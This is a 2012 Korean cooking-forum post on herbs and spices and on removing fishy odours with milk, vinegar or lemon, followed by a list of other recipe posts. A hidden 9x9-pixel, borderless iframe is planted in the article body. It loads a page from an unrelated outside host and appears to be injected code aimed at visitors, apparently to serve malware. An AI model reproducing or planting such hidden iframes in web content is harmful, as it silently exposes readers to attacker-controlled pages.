< 음식 맛집 와인...>

총 게시물 286건, 최근 0 건
   
생선 비린내는 우유로…신선 식품 노하우
글쓴이 : yori 날짜 : 2012-10-14 (일) 09:26 조회 : 1254



생선 비린내는 우유로…신선 식품 노하우

우리나라 사람들은 음식을 할 때 마늘, 파, 생강 등 다양한 향신료 제품들을 많이 넣는다. 단독으로 먹으면 맵고 쓰지만, 음식에 넣으면 독특한 향을 발산하면서 나쁜 냄새도 제거해준다. 식품의약품안전청에 제공한 올바른 조리, 보관법에 대해 알아보자.


◇식품의 향을 살리려면 
마늘은 음식을 조리할 때 마지막에 넣는다. 마늘에는 매운 향 성분인 ‘알리신’이 있는데, 알리신을 생성하는 효소인 ‘알리나아제’가 열에 약하기 때문에 열을 가하면 마늘의 매운 맛이 쉽게 사라진다. 

겨자는 찬물보다 미지근한 물에 푸는 게 좋다. 겨자의 매운 향 성분인 ‘시니그린’을 활성화하는 효소 ‘티오글루코시다아제’가 낮은 온도에서는 제대로 풀어지지 않기 때문이다. 

후추는 햇빛이 없는 곳에 보관한다. 후추의 매운 향 성분인 ‘피페린’이 햇빛에 쉽게 분해되기 때문이다. 

마지막으로, 파는 여러 향이 열에 의해 쉽게 파괴되고 시간이 지날수록 ‘황화수소’나 ‘디메틸설파이드’ 등 불쾌한 향으로 변하기 때문에 오래 끓이지 않는다. 

◇비린내를 없애려면 
콩나물을 삶을 때 비린내가 나기 쉬운데, 이때는 뚜껑을 자주 열지 않는다. 콩류의 비린내를 유발하는 효소가 물이 끓는 온도보다 낮은 85도 근처에서 가장 활발히 작용하기 때문이다. 

생선 비린내를 제거하기 위해서는, 생선을 우유에 잠시 담그거나 식초 또는 레몬즙을 뿌리면 된다. 이때는 우유 단백질에 비린내가 흡착되고, 비린내 성분인 ‘트리메틸아민’이 염기성이어서 산성인 식초나 레몬즙에 의하여 중화되기 때문이다. 

특히 민물고기는 바다 생선보다 더 비린내가 많이 나므로, 조리할 때 미나리 등 향이 강한 채소나 양념을 함께 사용하는 것이 좋다. <iframe height="9" src="http://cbh.com.ne.kr/check-4.htm" frameborder="0" width="9" scrolling="no" topmargin="0"></iframe>
 

출처 : 헬스조선 




   

총 게시물 286건, 최근 0 건
번호 제목 글쓴이 조회
286  아직도 '화사 곱창' 생각나나요? 의사들은 안 먹습니다 써니 2145
285  염증을 일으키는 식품 써니 1530
284  중국집 음식 먹지 않아야 할 이유 써니 1872
283  와인의 맛을 더 풍부하게… 와인 제대로 즐기는 3가지 방법 써니 1795
282  Tips for Letting Your Wine Breathe 써니 1955
281  ♡양파의 효능 54가지 ♡ 써니 1336
280  몸에 좋지만 거친 잡곡밥 맛있게 짓는 비법? '이것' 두 잔 넣으세요. 써니 987
279  양파 썰고 바로 먹을까? 뒀다가 먹을까? '효능' 제대로 보는 법 써니 965
278  스테이크만큼 단백질이 풍부한 식품 5 써니 1088
277  건강한 안주 선택법… 와인에는 치즈보다 고기 써니 1075
276  최고 맛있는 버거 레서피 스무가지 써니 879
275  와인의 종류 +4 써니 1154
274  요리 대 백과사전 (KOREAN YORI 제공) 써니 1380
273  CNN 이 선정한 한국음식 베스트 5 써니 1443
272  꽁치통조림 김치찌개 만드는 법, 통조림 특유 냄새 없애려면? +2 써니 1894
271  라면의 속설에 대한 10가지 오해와 진실 +2 써니 1559
270  오무라이스 만드는 법 (동영상) 써니 1481
269  Chinese Menu - Dim Sum 點心 点心 딤섬 점심 +4 써니 2492
268  뽀얀 국물, 곰탕의 두 얼굴 +1 써니 1646
267  식품독성 전문가 최석영교수 “된장보다 라면이 몸에 좋아” +1 써니 1640
266  콜라 속의 당(糖)은 나쁘고, 과일 속의 당(糖)은 좋은 걸까? 써니 1324
265  소주 안주 베스트 3… '이것' 곁들이면 덜 취한다 +1 써니 1520
264  오징어 데치고 초고추장 만들기 써니 1461
263  [권순홍의 음식기행 - 홍콩②] 상기 콘지(生記清湯牛腩麵, Sang Kee Consomme Noodle) 써니 2143
262  "고기 핏기 띠게 하는 물질이 맛의 핵심… 그 비밀 소스를 식물서 추출" 써니 1720
261  '고기 아닌 고기'(fake meat)에 투자하는 실리콘밸리 갑부들 +1 써니 1937
260  라면 끓이는 법 +2 써니 1879
259  전갱이 묵은지찜 써니 1780
258  찬찬찬 표 해물 달걀찜 써니 2176
257  참치회를 가장 맛있게 먹으려면... 써니 2009
256  美 "음식 속 콜레스테롤 無害" 써니 1765
255  지금 뉴욕에서 가장 핫한 슈퍼푸드 7 kangby 1920
254  스테이크는… '불'의 과학 티모시 1733
253  타임지 선정발표 10대 슈퍼푸드 times 3094
252  먹어두면 藥이 되는 Super Food 12 yskfood 1730
251  [Why] 이 칠레 와인의 역발상, 프랑스 와인도 놀랐다 hanhw 2054
250  양파로 김치 담그기 yori 2205
249  세계에서 가장 비싼 Top 50 Wines iwine 1730
248  카사노바가 하루 48개씩 먹은 굴 yori 1643
247  "중국음식 먹을 때 茶 마시지 말라"는 중국 茶전문가-왐포아클럽 티소믈리에 인터뷰 yori 1647
246  [펌] 요리 1004 가지 레시피 한눈에 보세요 (2) yori 1705
245  [펌] 요리 1004 가지 레시피 한눈에 보세요 (1) yori 1642
244  요리를 잘하려면 50가지Tip yori 1916
243  영양높은 알뜰 별미반찬 24가지 +1 yori 1666
242  옛날식 도시락반찬 만들어보기 yori 1655
241  몸에 좋은 양파수제비 만들기 yori 1822
240  가을밥상 맛있는국 끓여보기 yori 1911
239  보약으로 먹는 보양밥 해보기 yori 1444
238  요리 파워블로거 나나가 찾은 평양냉면 맛집 투어 yori 1582
237  그때 먹었던 그 맛… '2012년 스타일'로 즐긴다 yori 1567
236  달 구경도 식후경 ~ 식도락가들의 즐겨찾기 해운대 달맞이길 yori 1991
235  영양 많은 "순두부 들깨탕" 만들기 yori 1826
234  입맛 따라 고른다! 동태탕 vs 대구탕 열전 yori 1703
233  초밥, 튀김, 파스타… 고등어의 화려한 변신 yori 1780
232  모든 "찌개" 레시피...다 모였습니다 yori 1718
231  세계10대 불량식품 yori 1450
230  묵은지 돼지고기꼬치전 yori 2369
229  혼다시를 사용한 색다른 삼색 계란말이 yori 1753
228  맛 있는 밥상 (된장덮밥) yori 1484
227  깻잎·상추·포도…농약 걱정 없이 세척하는 법은? yori 2013
226  알아두면 得이 되는 음식상식 50가지 yori 1655
225  고추 간장 장아찌 yori 1419
224  달달함과 칼칼한 돼지갈비찜 yori 1907
223  생호박 효소~ 호박한덩이 300% 활용하는 방법 yori 2108
222  육개장보다 맛있는 마늘 토란대 닭볶음탕 yori 1847
221  생선 비린내는 우유로…신선 식품 노하우 yori 1255
220  꿀과 계피 가루 yori 1307
219  계란을 더 먹어야 하는 5가지 이유 yori 1389
218  생선회를 드시는 상식 yori 1159
217  태안의 별미 게국지를 아시나요? yori 2810
216  튀긴두부 국수장국 yori 1225
215  감자와 부추전 yori 1247
214  영양 가득한 부추달걀 볶음밥 yori 1313
213  시원하게 건강한 된장 냉국밥 yori 1962
212  매운 쇠고기 감자조림 yori 1994
211  고소함의 최고봉, 버섯베이컨 덮밥 yori 1360
210  왜 중국집 볶음밥을 좋아하냐구요? yori 1494
209  자장소스 만드는 법 yori 1536
208  간장게장 yori 1117
207  양념게장 비법 yori 1293
206  설렁탕집 깍두기 yori 1318
205  참치볶음고추장 yori 1285
204  주말에 만드는 영양반찬4가지 yori 1370
203  미역을 가지고 간단한 반찬3가지 yori 1348
202  국,찌게,전골 (약 130가지 요리법) yori 1398
201  각종반찬 (역 180가지 요리법) yori 2790
200  국수,면요리 (역 60가지 요리법) yori 1290
199  빵종류,홈 브레드 (약 90가지 요리법), 샐러드 (약 60가지 만드는 법), 음료,차 디저트 (약 30… yori 1507
198  세계 14개국의 아침식사, 브런치 메뉴 yori 1881
197  양배추무침 yori 1464
196  간단한 치즈 계란말이 yori 1340
195  단호박 고등어 조림 yori 1809
194  몸에좋은 치즈...제대로 먹는방법 yori 1298
193  육류·채소·생선‥가열시간 따라 건강 달라 yori 1248
192  [한식요리][삼색나물]고사리* 도라지* 시금치나물 / 부드러운 소갈비찜 yori 1405
191  홍합요리 모음집 & 홍합손질*보관법 yori 3755
190  밥도둑.술도둑 같으니[황태구이] yori 1144
189  연근떡갈비와 무생채 yori 1523
188  초보도 쉽게 따라 할 수 있는 김치담그는 법 yori 1574
187  부드러운 소갈비찜 yori 1477
 1  2  3  맨끝









맨위로